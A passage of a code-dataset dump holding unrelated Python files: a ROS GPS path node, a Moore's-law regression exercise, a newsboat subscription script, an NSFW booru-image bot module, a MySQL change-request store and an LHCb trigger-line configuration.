[(title, elements) for (title, elements, _) in result]\n self.assertEqual(\n [(u'0.1.27',\n [u'dash for bullet list']),\n (u'0.1.26',\n [u'substitutions in reStructuredText',\n u'Copyright \\xa9 2003',\n u'using + for bullet list, and reference `Python `_',\n u'second element *emphasized*']),\n (u'0.1.4', [u'text without bullet list']),\n (u'0.1.3', [u'section title with added comment'])],\n result_no_sections)\n","sub_path":"test/sample_test.py","file_name":"sample_test.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"384875062","text":"#! /usr/bin/env python\n\nimport rospy\n#import tf\nimport numpy as np\nimport time\nimport rospkg\nfrom sensor_msgs.msg import NavSatFix\nfrom sensor_msgs.msg import Imu\nfrom geometry_msgs.msg import PoseStamped\nfrom nav_msgs.msg import Path\nfrom std_msgs.msg import Float32\n#import tf2_ros\nfrom pyproj import Proj\nfrom pyproj import transform\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\n#from geometry_msgs.msg import TransformStamped\n#from tf.transformations import euler_from_quaternion, quaternion_from_euler\n\nfrom gps_common import *\nimport copy\nfrom math import *\n\nWGS84 = { 'proj':'latlong', 'datum':'WGS84', 'ellps':'WGS84', }\nGRS80 = { 'proj':'tmerc', 'lat_0':'38', 'lon_0':'127', 'k':1, 'x_0':0,\n 'y_0':0, 'ellps':'GRS80', 'units':'m' }\n#'lat_0':'38.000036', 'lon_0':'127.00038'\ndef grs80_to_wgs84(x, y):\n return transform( Proj(**GRS80), Proj(**WGS84), x, y )\n\ndef wgs84_to_grs80(x, y):\n return transform( Proj(**WGS84), Proj(**GRS80), y, x )\n'''\ndef pub_tf_transform(lat,lon):\n br = tf2_ros.TransformBroadcaster()\n t = TransformStamped() # pose of turntable_frame w.r.t. turntable_base\n t.header.stamp = rospy.Time.now()\n t.header.frame_id = 'world'\n t.child_frame_id = 'GPS_link'\n t.transform.translation.x = lat\n t.transform.translation.y = lon\n t.transform.translation.z = 0\n t.transform.rotation.x = 0\n t.transform.rotation.y = 0\n t.transform.rotation.z = 0\n t.transform.rotation.w = 1\n br.sendTransform(t)\n'''\ndef gps_callback(data):\n global lat, lon, utm_lat_lon\n\n #print(odom_x)\n lat = data.latitude\n lon = data.longitude\n #print(lat, lon)\n utm_lat_lon = wgs84_to_grs80(lat, lon)\n\ndef imu_callback(data):\n global imu_yaw\n imu_quaternion = [data.orientation.x, data.orientation.y, data.orientation.z, data.orientation.w]\n\n roll, pitch, imu_yaw = euler_from_quaternion (imu_quaternion)\n imu_yaw=imu_yaw*180/np.pi\n #print(imu_yaw)\n\ndef speed_callback(data):\n global speed\n\n speed = data.data/36\n\ndef find_gps_step(last_step, cur_gps):\n min_length=100\n cur_step=0\n\n for step_gps in range(last_step-4):\n gps_n = gps_data[step_gps].split(',')\n gps_n_1 = gps_data[step_gps+1].split(',')\n gps_n_2 = gps_data[step_gps+2].split(',')\n\n\n # gps_n = [float(gps_n[0]) - float(gps_origin[0]), float(gps_n[1]) - float(gps_origin[1])]\n # gps_n_1 = [float(gps_n_1[0]) - float(gps_origin[0]), float(gps_n_1[1])- float(gps_origin[1])]\n gps_n = [float(gps_n[0]), float(gps_n[1])]\n gps_n_1 = [float(gps_n_1[0]), float(gps_n_1[1])]\n gps_n_2 = [float(gps_n_2[0]), float(gps_n_2[1])]\n\n\n utm_gps_n = wgs84_to_grs80(gps_n[0],gps_n[1])\n utm_gps_n_1 = wgs84_to_grs80(gps_n_1[0],gps_n_1[1])\n utm_gps_n_2 = wgs84_to_grs80(gps_n_2[0],gps_n_2[1])\n utm_gps_cur = wgs84_to_grs80(lat,lon)\n\n length1 = sqrt((utm_gps_cur[0]-utm_gps_n[0])**(2)+(utm_gps_cur[1]-utm_gps_n[1])**(2))\n length2 = sqrt((utm_gps_cur[0]-utm_gps_n_1[0])**(2)+(utm_gps_cur[1]-utm_gps_n_1[1])**(2))\n\n length = length1+length2\n '''\n line_data_x=[utm_gps_n[0],utm_gps_n_1[0],utm_gps_n_2[0]]\n line_data_y=[utm_gps_n[1],utm_gps_n_1[1],utm_gps_n_2[1]]\n fp1 = np.polyfit(line_data_x,line_data_y,1)\n y= fp1[0]*step_gps+fp1[1]\n length=abs(fp1[0]*utm_gps_cur[0] - utm_gps_cur[1] + fp1[1])/sqrt(fp1[0]**(2)+(-1)**(2)) #find length\n '''\n\n if(length=10) and speed>=1.8 and abs(d_theta)<=1.5):\n theta_error_count+=1\n\n if(theta_error_count>=20):\n adjust_yaw_sign=True\n theta_error_count=0\n else:\n theta_error=imu_yaw-gps_theta2\n 
theta_error_count=0\n\n\n #print(pathmsg.poses[step_gps].pose.position.x)\n\n #pub_utm_cur_gps(utm_lat_lon[0], utm_lat_lon[1])\n #pub_tf_transform(lat,lon)\n\n else:\n pass","sub_path":"autonomous-vehicle-MDS/stauto_sensor/src/global_path_ver3.py","file_name":"global_path_ver3.py","file_ext":"py","file_size_in_byte":9039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"104019400","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 9 16:58:02 2020\n\n@author: ablusenk\n\"\"\"\n\nimport re \nimport pandas as pd \nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnon_decimat = re.compile(r'[^\\d]+')\n\nds = pd.read_csv(\"/Users/ablusenk/GitHub/udemy/machine_learning_examples/linear_regression_class/moore.csv\",\n names = [\"Processor\", \"Transistors\", \"Year\", \"Vendor\", \"Technology\", \"Footprint\"], sep = \"\\t\", error_bad_lines=False)\n\n\n# ========================================================================== #\n# cleaning data to keep only digits \n# converting each value in int\nY = ds.Transistors\npat = r\"\\[.*\\]|\\D\"\nY = Y.str.replace(pat, '', regex = True)\nY = pd.to_numeric(Y)\n\n\n# cleaning data same way\nX = ds.Year\nX = X.str.replace('\\[.*\\]', '', regex = True)\nX = pd.to_numeric(X) \n\n\n# ========================================================================== #\n# Year/Transistors scatterplot\n# ticks removed not to crowd plot\n\n#THIS PLOT REMOVED, otherwise two plotted in one... shitty\nplt.scatter(X, Y)\nplt.xlabel(\"Year\")\nplt.ylabel(\"Transistors\")\nplt.xticks([])\nplt.yticks([])\nplt.show()\n\n# converting Y (Transistor) to log to get linear regression\nY = np.log(Y)\n\nplt.scatter(X,Y)\nplt.xlabel(\"Year\")\nplt.ylabel(\"Transistors\")\nplt.title(\"Linear Reg of Moore\")\nplt.xticks([])\nplt.yticks([])\nplt.show()\n\n\n# ========================================================================== #\n# Solving linear regression problem for logarithmic Y\ndenominator = X.dot(X) - X.mean() * X.sum()\na = ( X.dot(Y) - Y.mean() * X.sum() ) / denominator\nb = ( Y.mean() * X.dot(X) - X.mean() * X.dot(Y) ) / denominator\n\nY_pred = a * X + b\n\n\n# ========================================================================== #\n# calculating R-squared for linear regression\nd1 = Y - Y_pred\nd2 = Y - Y.mean()\nR_sq = 1 - (d1.dot(d1) / d2.dot(d2))\n\n\nplt.scatter(X,Y)\nplt.plot(X, Y_pred)\nplt.xlabel(\"Year\")\nplt.ylabel(\"Transistors\")\nplt.title(\"Linear Reg of Moore\")\nplt.xticks([])\nplt.yticks([])\nplt.show()\n\nprint(\"R-squared for particular problem is:\", R_sq)\n\n\n# ========================================================================== #\n# find time to double (in accordance with M oore's law) number of transistors\n# this will be our X2\n# log(Transistors) = a*X + b \n# ...now taking log of both sides \n# Transistors = exp(b) * exp(a * X)\n# 2*Transistors = 2 * exp(b) * exp(a * X) = exp(ln(2)) * exp(b) * exp(a * X)\n# = exp(b) * exp(a * X + ln(2))\n# ...or \n# exp(b) * exp(a * X2) = exp(b) * exp(a * X + ln(2))\n# ...or \n# a * X2 = a * X + ln(2)\n# ...or \n# X2 = X + ln(2)/a\nprint(\"Time to double number of transistors is:\", np.log(2)/a, \"years\") \n\n","sub_path":"linear_regression_class/moore_abl.py","file_name":"moore_abl.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"265890514","text":"import requests\nimport bs4\nimport sys\nimport os\n\ndef main():\n\n\tif len(sys.argv) == 1:\n\t\tprint('subscribe [...]')\n\t\tsys.exit(0)\n\n\thome_dir = os.environ['HOME']\n\twith open(f'{home_dir}/.newsboat/urls', 'a+') as urls_file:\n\t\turls_file.seek(0)\n\n\t\texisting_channel_ids = set()\n\t\tfor line in urls_file.readlines():\n\t\t\tline = line.rstrip()\n\t\t\texisting_channel_ids.add(line[52:76])\n\n\t\tfor url in sys.argv[1:]:\n\n\t\t\tr = requests.get(url)\n\t\t\thtml_source = r.text\n\n\t\t\tsoup = bs4.BeautifulSoup(html_source, 'html.parser')\n\t\t\t\n\t\t\tchannel_name = soup.find(\"meta\", {\"property\":\"og:title\"})['content']\n\n\t\t\tlinks = soup.findAll('link', href=True)\n\t\t\tfor link in links:\n\t\t\t\t\n\t\t\t\tif link['href'].startswith('https://www.youtube.com/channel/'):\n\t\t\t\t\txml = 'https://www.youtube.com/feeds/videos.xml?channel_id='\n\t\t\t\t\tchannel_id = link['href'][32:]\n\n\t\t\t\t\tif channel_id in existing_channel_ids:\n\t\t\t\t\t\tprint('You are already subscribed to ' + channel_name)\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t\tline_item = f'{xml}{channel_id} \"~{channel_name}\"'\n\t\t\t\t\turls_file.write('\\n' + line_item)\n\t\t\t\t\texisting_channel_ids.add(channel_id)\n\t\t\t\t\tprint('Added to newsboat: ')\n\t\t\t\t\tprint(line_item)\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint('Channel ID not found. Unable to add to newsboat')\n\n","sub_path":"package_src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"474715768","text":"\"\"\"\nNSFW functions\n\"\"\"\nfrom random import choice\nfrom typing import List, Optional, Tuple\n\nfrom aiohttp import ClientSession, ClientResponseError\nfrom requests import get\nfrom xmltodict import parse\n\nfrom data_controller.tag_matcher import TagMatcher\nfrom scripts.helpers import aiohttp_get, flatten\n\n__all__ = ['get_lewd', 'greenteaneko']\n\n\ndef __parse_query(query: Tuple[str]) -> tuple:\n \"\"\"\n Helper function to parse user search query.\n :param query: the search query.\n :return: (list of tags, rating)\n \"\"\"\n rating = None\n tags = []\n for q in query:\n if q[:8].lower() in ('rating:s', 'rating:e', 'rating:q'):\n rating = q.lower()\n else:\n tags.append(q)\n return tags, rating\n\n\ndef __combine(rating, join_str, *tags: List[str]) -> str:\n \"\"\"\n Combine a rating string and multiple tag lists into a single search\n string.\n :param rating: the rating.\n :param join_str: the character to join the list.\n :param tags: the lists of tags.\n :return: a single search string.\n \"\"\"\n if rating:\n return join_str.join(flatten(tags) + [rating])\n return join_str.join(flatten(tags))\n\n\ndef __process_queries(\n site: str, tags: List[str], tag_matcher: TagMatcher) -> tuple:\n \"\"\"\n Process a list of tags to separate them into two lists.\n :param site: the site of the tags\n :param tags: the list of tags.\n :param tag_matcher: the TagMatcher object.\n :return: two lists of tags. The first one are the list of tags that are\n in the db, the second one are the list of tags that aren't in the db.\n \"\"\"\n safe_queries = []\n unsafe_queries = []\n for q in tags:\n if tag_matcher.tag_exist(site, q):\n safe_queries.append(q)\n else:\n unsafe_queries.append(q)\n return safe_queries, unsafe_queries\n\n\nasync def __request_lewd(\n tags: List[str], rating: Optional[str], url: str,\n site: str, session: ClientSession, tag_matcher: TagMatcher) -> tuple:\n \"\"\"\n Make an HTTP request to a lewd site.\n :param tags: the list of tags for the search.\n :param rating: the rating of the search.\n :param url: the request url.\n :param site: the site name.\n :param session: the aiohttp ClientSession\n :param tag_matcher: the TagMatcher object.\n :return: a tuple of\n (request response, tags that are in the TagMatcher db,\n tags that are not in the TagMatcher db)\n :raises: ClientResponseError if the status code isnt 200\n \"\"\"\n safe_queries, unsafe_queries = __process_queries(\n site, tags, tag_matcher)\n combined = __combine(rating, '%20', safe_queries, unsafe_queries)\n\n # FIXME: gelbooru doesn't play nice with aiohttp\n if site == 'gelbooru':\n res = get(url + combined)\n if res.status_code != 200:\n raise ClientResponseError\n else:\n res = await aiohttp_get(url + combined, session, False)\n return res, safe_queries, unsafe_queries\n\n\nasync def __parse_result(response, site: str) -> list:\n \"\"\"\n Parse the HTTP response of a search and return the post list.\n :param response: the HTTP response.\n :param site: the site name.\n :return: The list of posts.\n \"\"\"\n if site == 'gelbooru':\n res = parse(response.text)['posts']\n if 'post' in res and res['post']:\n return res['post']\n else:\n return await response.json()\n\n\ndef __parse_post_list(\n post_list: list, url_formatter: callable, tag_key) -> tuple:\n \"\"\"\n Parse the post list to return the file url and its tags.\n :param post_list: the post list.\n :param url_formatter: a callable to get the file url.\n :param tag_key: the key to get the tag string.\n :return: a tuple of 
(file url, list of tags)\n \"\"\"\n post = choice(post_list)\n file_url = url_formatter(post)\n return file_url, post[tag_key].split(' ')\n\n\ndef __retry_search(\n site: str, safe_queries: List[str],\n unsafe_queries: List[str], tag_matcher: TagMatcher) -> list:\n \"\"\"\n Generate tags to retry the search if no results were found.\n :param site: the site name.\n :param safe_queries: the search tags that are in the db.\n :param unsafe_queries: the search tags that are not in the db.\n :param tag_matcher: the TagMatcher object.\n :return: a list of tags that are either in the db or matched with one in\n the db.\n \"\"\"\n retry = safe_queries[:]\n for unsafe in unsafe_queries:\n match = tag_matcher.match_tag(site, unsafe)\n if match:\n retry.append(match)\n return retry\n\n\ndef __get_site_params(\n site: str, api_key: Optional[str], user: Optional[str]) -> tuple:\n \"\"\"\n Get function call parameters for a site.\n :param site: the site name.\n :param api_key: the danbooru api key, not required for other sites.\n :param user: the danbooru username, not required for other sites.\n :return: the request url, the file url formatter, the key for the tag string\n \"\"\"\n request_url = {\n 'danbooru': f'https://danbooru.donmai.us//posts.json?login='\n f'{user}&api_key={api_key}&limit=1&random=true&tags=',\n 'konachan': 'https://konachan.com//post.json?tags=',\n 'yandere': 'https://yande.re//post.json?tags=',\n 'e621': 'https://e621.net/post/index.json?&tags=',\n 'gelbooru': 'https://gelbooru.com//index.php?'\n 'page=dapi&s=post&q=index&tags='\n }[site]\n url_formatter = {\n 'danbooru': lambda x: 'https://danbooru.donmai.us' + x['file_url'],\n 'konachan': lambda x: 'https:' + x['file_url'],\n 'yandere': lambda x: x['file_url'],\n 'e621': lambda x: x['file_url'],\n 'gelbooru': lambda x: 'https:' + x['@file_url']\n }[site]\n tag_key = {\n 'danbooru': 'tag_string',\n 'konachan': 'tags',\n 'yandere': 'tags',\n 'e621': 'tags',\n 'gelbooru': '@tags'\n }[site]\n return request_url, url_formatter, tag_key\n\n\nasync def __get_lewd(\n tags: Optional[list], rating: Optional[str], site: str, site_params,\n tag_matcher: TagMatcher, session: ClientSession = None,\n limit=0, fuzzy=False) -> tuple:\n \"\"\"\n Get lewds from a site.\n :param tags: the search tags.\n :param rating: the rating of the search.\n :param site: the site name.\n :param site_params: the function call parameters for the site.\n :param tag_matcher: the TagMatcher object.\n :param session: the aiohttp ClientSesson.\n :param limit: maximum recursion depth\n :param fuzzy: whether the search was fuzzy or not.\n :return: a tuple of\n (file url, tags used in the search, fuzzy, tags to write to the db)\n \"\"\"\n assert session or site == 'gelbooru'\n if limit > 2:\n return (None,) * 4\n url, url_formatter, tag_key = site_params\n res, safe_queries, unsafe_queries = await __request_lewd(\n tags, rating, url, site, session, tag_matcher)\n post_list = await __parse_result(res, site)\n if post_list:\n file_url, tags_to_write = __parse_post_list(post_list, url_formatter,\n tag_key)\n return file_url, safe_queries + unsafe_queries, fuzzy, tags_to_write\n retry = __retry_search(site, safe_queries, unsafe_queries, tag_matcher)\n if retry:\n return await __get_lewd(\n retry, rating, site, site_params,\n tag_matcher, session, limit + 1, True\n )\n return (None,) * 4\n\n\nasync def get_lewd(\n site: str, search_query: tuple, localize: dict,\n tag_matcher: TagMatcher, user=None, api_key=None) -> tuple:\n \"\"\"\n Get lewd picture you fucking perverts.\n 
:param site: the site name.\n :param search_query: the search query.\n :param localize: the localization strings.\n :param tag_matcher: the TagMatcher object.\n :param user: the danbooru username, not required for other sites.\n :param api_key: the danbooru api key, not required for other sites.\n :return: a tuple of\n (the message with the file url to send, a list of tags to write to the db)\n \"\"\"\n assert site in ('danbooru', 'konachan', 'yandere', 'e621', 'gelbooru')\n assert (user and api_key) or site != 'danbooru'\n tags, rating = __parse_query(search_query)\n site_params = __get_site_params(site, api_key, user)\n\n session = ClientSession() if site != 'gelbooru' else None\n try:\n file_url, searched_tags, fuzzy, tags_to_write = await __get_lewd(\n tags, rating, site, site_params, tag_matcher, session)\n if session is not None:\n session.close()\n if file_url:\n msg = file_url\n if fuzzy:\n msg = localize['nsfw_fuzzy'].format(\n site.title(), ', '.join(searched_tags)) + file_url\n elif not search_query:\n msg = localize['random_nsfw'] + '\\n' + file_url\n return msg, tags_to_write\n else:\n return localize['nsfw_sorry'], None\n except ClientResponseError:\n return localize['api_error'].format(site.title()), None\n\n\nasync def greenteaneko(localize):\n \"\"\"\n Get a random green tea neko comic\n :param localize: the localization strings\n :return: the green tea neko comic\n \"\"\"\n url = 'https://rra.ram.moe/i/r?type=nsfw-gtn&nsfw=true'\n try:\n res = await aiohttp_get(url, ClientSession(), True)\n js = await res.json()\n return 'https://rra.ram.moe{}\\n{}'.format(\n js['path'], localize['gtn_artist'])\n except ClientResponseError:\n return localize['api_error'].format('rra.ram.moe')\n","sub_path":"core/nsfw_core.py","file_name":"nsfw_core.py","file_ext":"py","file_size_in_byte":9598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"621840617","text":"from datetime import datetime, timedelta\nimport mysql.connector\nfrom mysql.connector import errorcode\nimport json\nimport serviceNowRetriever as retriever\n\n# init\n\n# connect to the its own database\nDB_NAME = 'mondb'\ndbConfig = {'user': 'root',\n 'password': 'root',\n 'host': '127.0.0.1',\n 'database': DB_NAME}\nTABLES = {'crn': (\n \"CREATE TABLE `crn` (\"\n \" `ID` int NOT NULL AUTO_INCREMENT,\"\n \" `cr_number` varchar(50) NOT NULL,\"\n \" `start_date` DATETIME NOT NULL,\"\n \" `end_date` DATETIME NOT NULL,\"\n \" `req_created_on` DATETIME NOT NULL,\"\n \" `affected_CIs` varchar(20000) NOT NULL,\"\n \" `CIs_updated_on` DATETIME NOT NULL,\"\n \" `status` varchar(10) NOT NULL,\"\n \" PRIMARY KEY (`ID`), UNIQUE KEY `cr_number` (`cr_number`)\"\n \") ENGINE=InnoDB\")}\n\n\nclass SqlPython(object):\n cnx = None\n cursor = None\n isBusy = False\n\n def __init__(self):\n self.connect_sql()\n\n def connect_sql(self):\n try:\n print(\"connecting to database\")\n self.cnx = mysql.connector.connect(**dbConfig)\n self.cursor = self.cnx.cursor()\n print(\"setting up cursor\")\n except mysql.connector.Error as e:\n if e.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n elif e.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(e)\n return 1\n return 0\n\n def create_table(self, tables):\n for name, ddl in tables.items():\n try:\n print(\"Creating table {}: \".format(name), end='')\n self.cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n def create_db(self, db):\n try:\n self.cnx.database = db\n print(\"find database\")\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n try:\n self.cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME))\n except mysql.connector.Error as err:\n print(\"Failed creating database: {}\".format(err))\n self.cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\n\n def insert_table(self, target, target_data):\n self.isBusy = True\n print(\"Inserting\")\n self.cursor.execute(target, target_data)\n self.cnx.commit()\n self.isBusy = False\n\n def stop_sql(self):\n self.cursor.close()\n self.cnx.close()\n\n # query cis' lastest updated time\n def query_cis_updated_on(self, cr_num):\n self.isBusy = True\n query = (\"SELECT CIs_updated_on FROM crn \"\n \"WHERE cr_number=%s\")\n try:\n self.cursor.execute(query, (cr_num,))\n except mysql.connector.Error as err:\n print(\"Query CIs for {}: {}\".format(cr_num, err))\n self.isBusy = False\n return self.cursor.fetchone()[0]\n\n # update cis list if applicable\n def update_cis_updated_on(self, new_cis, cr_num, new_cis_updated_on):\n self.isBusy = True\n query = (\"UPDATE crn \"\n \"SET affected_CIs=%s, CIs_updated_on=%s\"\n \"WHERE cr_number=%s\")\n try:\n # print(type(new_cis_updated_on))\n self.cursor.execute(query, (json.dumps(new_cis), new_cis_updated_on, cr_num))\n self.cnx.commit()\n except mysql.connector.Error as err:\n print(\"Failed updating CIs for {}: {}\".format(cr_num, err))\n self.isBusy = False\n\n # get list of device that has actions in a period of time\n def query_within(self, duration):\n query = (\"SELECT * FROM crn \"\n \"WHERE (status=0 AND start_date between %s and %s)\"\n \"OR (status=3 AND end_date between %s and %s)\")\n try:\n self.cursor.execute(query, 
(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n (datetime.now() + timedelta(hours=duration)).strftime('%Y-%m-%d %H:%M:%S'),\n datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n (datetime.now() + timedelta(hours=duration)).strftime('%Y-%m-%d %H:%M:%S')))\n except mysql.connector.Error as err:\n print(\"Query msg {}\".format(err))\n list_query_list = self.cursor.fetchall()\n if list_query_list is None:\n return None\n result_list = []\n for item in list_query_list:\n result_list.append(list(item))\n # if list_query_list:\n # self.update_status(list_query_list, 1)\n return result_list\n\n # update the status for each change request\n def update_status(self, req_num, status_code):\n query = (\"UPDATE mondb.crn \"\n \"SET status=%s \"\n \"where cr_number=%s\")\n try:\n self.cursor.execute(query, (status_code, req_num))\n self.cnx.commit()\n except mysql.connector.Error as err:\n print(\"Failed updating status for {}: {}\".format(req_num, err))\n\n # status: {0: in the queue, 1: scheduled, 2: under maintenance, 3: done}\n def update_db(self):\n self.isBusy = True\n add_cr = (\"INSERT INTO crn \"\n \"(cr_number, start_date, end_date, req_created_on, affected_CIs, CIs_updated_on, status) \"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s)\")\n req = retriever.get_req_list()\n for item in req:\n data_cr = (item['cr_number'], item['start_date'], item['end_date'], item['req_created_on'],\n json.dumps(item['affected_CIs']), item['CIs_updated_on'], 0)\n try:\n self.insert_table(add_cr, data_cr)\n except mysql.connector.Error as err:\n print(\"Error!\")\n if err.errno == errorcode.ER_DUP_ENTRY:\n if self.query_cis_updated_on(item['cr_number']) == item['CIs_updated_on']:\n print(\"CIs have not changed. Skipping...\")\n self.update_cis_updated_on(item['affected_CIs'], item['cr_number'], item['CIs_updated_on'])\n else:\n print(\"CIs for {} has changed, updating...\".format(item['cr_number']))\n self.update_cis_updated_on(item['affected_CIs'], item['cr_number'], item['CIs_updated_on'])\n self.isBusy = False\n\n\nif __name__ == \"__main__\":\n s = SqlPython()\n # s.connect_sql()\n # TABLES = {'crn': (\n # \"CREATE TABLE `crn` (\"\n # \" `ID` int NOT NULL AUTO_INCREMENT,\"\n # \" `cr_number` varchar(50) NOT NULL,\"\n # \" `start_date` DATETIME NOT NULL,\"\n # \" `end_date` DATETIME NOT NULL,\"\n # \" `req_created_on` DATETIME NOT NULL,\"\n # \" `affected_CIs` varchar(20000) NOT NULL,\"\n # \" `CIs_updated_on` DATETIME NOT NULL,\"\n # \" `status` varchar(10) NOT NULL,\"\n # \" PRIMARY KEY (`ID`), UNIQUE KEY `cr_number` (`cr_number`)\"\n # \") ENGINE=InnoDB\")}\n # s.create_table(TABLES)\n\n # print(datetime.now() - timedelta(hours=28))\n # s_time = datetime.fromtimestamp(float(datetime.now() - timedelta(hours=28))).strftime('%Y-%m-%d %H:%M:%S')\n # e_time = datetime.fromtimestamp(float(datetime.now() - timedelta(hours=8))).strftime('%Y-%m-%d %H:%M:%S')\n # s.update_sql()\n # add_cr = (\"INSERT INTO crn \"\n # \"(cr_number, start_date, end_date, req_created_on, affected_CIs, CIs_updated_on, status ) \"\n # \"VALUES (%s, %s, %s, %s, %s, %s, %s)\")\n # req = retriever.get_req_list()\n # for item in req:\n # data_cr = (item['cr_number'], item['start_date'], item['end_date'], item['req_created_on'],\n # json.dumps(item['affected_CIs']), item['CIs_updated_on'], 2)\n # s.insert_table(add_cr, data_cr)\n # s_time = (datetime.now() - timedelta(hours=28)).strftime('%Y-%m-%d %H:%M:%S')\n # e_time = (datetime.now() - timedelta(hours=8)).strftime('%Y-%m-%d %H:%M:%S')\n # print(s_time)\n # s.update_cis_updated_on(['123', '315'], 
'CHG0085579', datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n l = s.query_cis_updated_on('CHG0091248')\n\n print(l)\n","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":8572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"457880311","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# =============================================================================\n# @file Inclusive.py\n# @author Albert Puig (albert.puig@cern.ch)\n# @date 14.04.2015\n# =============================================================================\n\"\"\"Inclusive B->hhgamma and B->hhhgamma lines.\"\"\"\n\n\nfrom RadiativeLineBuilder import RadiativeLineBuilder\n\n\nclass RadiativeInclusiveLines(RadiativeLineBuilder):\n @staticmethod\n def get_stages(props):\n from Stages import TrackGEC, TopoCombiner\n from HltTracking.HltPVs import PV3D\n from Hlt2Lines.Topo.Lines import TopoLines\n from Hlt2Lines.Topo.Stages import FilterMVA\n from Hlt2Lines.Utilities.Hlt2Stage import Hlt2ExternalStage\n\n # Load external stages\n topo_lines = TopoLines()\n two_body = Hlt2ExternalStage(topo_lines, topo_lines.stages(props['HHCombiner'])[0])\n three_body = Hlt2ExternalStage(topo_lines, topo_lines.stages(props['HHHCombiner'])[0])\n\n # Add the photon\n two_body_plus_photon = TopoCombiner('HHGammaCombo', 2, two_body)\n two_body_plus_ee = TopoCombiner('HHGammaComboEE', 2, two_body, True)\n three_body_plus_photon = TopoCombiner('HHHGammaCombo', 3, three_body)\n three_body_plus_ee = TopoCombiner('HHHGammaComboEE', 3, three_body, True)\n\n # Filter BDTs\n filtered_two_plus_one = FilterMVA(21,\n [two_body_plus_photon],\n props['HHGammaBBDT'],\n nickname='HHGammaBBDT',\n preambulo=['from LoKiCore.math import log10'])\n filtered_two_plus_ee = FilterMVA(22,\n [two_body_plus_ee],\n props['HHGammaEEBBDT'],\n nickname='HHGammaEEBBDT')\n filtered_three_plus_one = FilterMVA(31,\n [three_body_plus_photon],\n props['HHHGammaBBDT'],\n nickname='HHHGammaBBDT',\n preambulo=['from LoKiCore.math import log10'])\n filtered_three_plus_ee = FilterMVA(32,\n [three_body_plus_ee],\n props['HHHGammaEEBBDT'],\n nickname='HHHGammaEEBBDT')\n # Build stages\n return {'RadiativeIncHHGamma' : [TrackGEC(), PV3D('Hlt2'), filtered_two_plus_one],\n 'RadiativeIncHHHGamma' : [TrackGEC(), PV3D('Hlt2'), filtered_three_plus_one],\n 'RadiativeIncHHGammaEE' : [TrackGEC(), PV3D('Hlt2'), filtered_two_plus_ee],\n 'RadiativeIncHHHGammaEE': [TrackGEC(), PV3D('Hlt2'), filtered_three_plus_ee]}\n\n @staticmethod\n def get_cuts():\n from GaudiKernel.SystemOfUnits import MeV\n comb_cuts = {'APT_MIN' : 2000*MeV,\n 'VCHI2PDOF_MAX' : 1000,\n 'VDCHI2_MIN' : 0,\n 'ETA_MIN' : 2,\n 'ETA_MAX' : 5,\n 'CORRM_MIN' : 1000*MeV,\n 'CORRM_MAX' : 10000*MeV,\n 'DIRA_MIN' : 0}\n return {'HHCombiner': 'Topo2BodyCombos',\n 'HHGammaCombo': comb_cuts,\n 'HHGammaBBDT': {'BDT_PARAMS': 'Hlt2_RadiativeInc_2plus1_BDTParams_v1r0.txt',\n 'BDT_VARMAP': {'sv_ipchi2' : 'log10(BPVIPCHI2())',\n 'sv_children_pt_sum': '(CHILD(1, PT) + CHILD(2, PT))/MeV',\n 'gamma_pt' : 'CHILD(2, PT)/MeV',\n 'nbody_fdchi2' : 'log10(BPVVDCHI2)',\n 'sv_vtx_chi2' : 'log10(VFASPF(VCHI2))'},\n 'BDT_MIN': 10.0,\n 'CMB_VRT_MCOR_MIN': 1000*MeV,\n 'CMB_VRT_MCOR_MAX': 10000*MeV},\n 'HHGammaComboEE': comb_cuts,\n 'HHGammaEEBBDT': {'BDT_PARAMS': 'hlt2_topo_run2_v1.bbdt',\n 'BDT_VARMAP': {'n' : \"NINTREE((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma'))\",\n 'mcor' : \"BPVCORRM\",\n 'chi2' : \"VFASPF(VCHI2)\",\n 'sumpt' : \"SUMTREE(PT, ((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')), 0.0)/MeV\",\n 'eta' : \"BPVETA\",\n 'fdchi2' : \"BPVVDCHI2\",\n 'minpt' : \"MINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')), PT)/MeV\",\n 'nlt16' : 
